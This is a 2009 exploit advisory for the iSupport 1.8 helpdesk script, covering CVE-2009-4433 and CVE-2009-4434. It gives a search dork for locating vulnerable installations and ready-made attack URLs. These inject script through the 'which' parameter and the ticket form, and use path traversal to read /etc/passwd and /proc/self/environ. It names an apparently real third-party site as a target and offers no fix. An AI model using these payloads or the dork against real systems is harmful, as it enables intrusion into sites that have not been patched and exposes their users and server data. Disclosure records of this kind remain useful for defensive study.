Topic : | iSupport <= 1.8 XSS/Local File Include Exploit
|
SecurityAlert : 6886
CVE : CVE-2009-4433 CVE : CVE-2009-4434 CWE : CWE-79
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : Yes
Credit : Stink & Essandre
Published : 30.12.2009
Affected Software : | idevspot:isupport:1.8 and previous versions
idevspot:isupport:1.06
idevspot:isupport:1.02 |
 Advisory Content : ---------------------------------------------
++ iSupport <= 1.8 ++
XSS/Local File Include Exploit
---------------------------------------------
Discovered by : Stink' & Essandre
DATE : 16/12/09
//////////////////////////////////////////////////////////////////////
Website : http://www.idevspot.com/
DEMO : http://www.idevspot.com/demo/iSupport/
DOWNLOAD : http://www.idevspot.com/iSupport.php => $
//////////////////////////////////////////////////////////////////////
[+] Vulnerability and Exploitation
Dork : "Powered by [ iSupport 1.8 ]"
--[XSS]--
http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_cate
gory=PARENT_CATEGORY&which=[XSS]
http://[TARGET]/[PATH]/function.php?which=[XSS]
Exemple :
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_cate
gory=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%2
9%3C/script%3E
--[XSS]-- in the member zone
http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php
The flaw is in the form.
In "Subject, Comments, etc. ..."
After clicking "Submit Ticket" and you have your alert xss:)
--[LFI]--
http://[TARGET]/[PATH]/index.php?include_file=[LFI]
Exemple :
http://server/helpdesk/index.php?include_file=../../../../../proc/self/envi
ron
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd
[+] Solution :
N/A
The flaw is secure on some site, but we do not know if the publisher or
persons using the scripts that are secure.
References :
http://xforce.iss.net/xforce/xfdb/54859
http://xforce.iss.net/xforce/xfdb/54858
http://www.securityfocus.com/bid/37380
http://www.osvdb.org/61112
http://www.osvdb.org/61111
http://www.osvdb.org/61109
http://www.exploit-db.com/exploits/10478
http://secunia.com/advisories/37726
http://packetstormsecurity.org/0912-exploits/isupport-lfixss.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|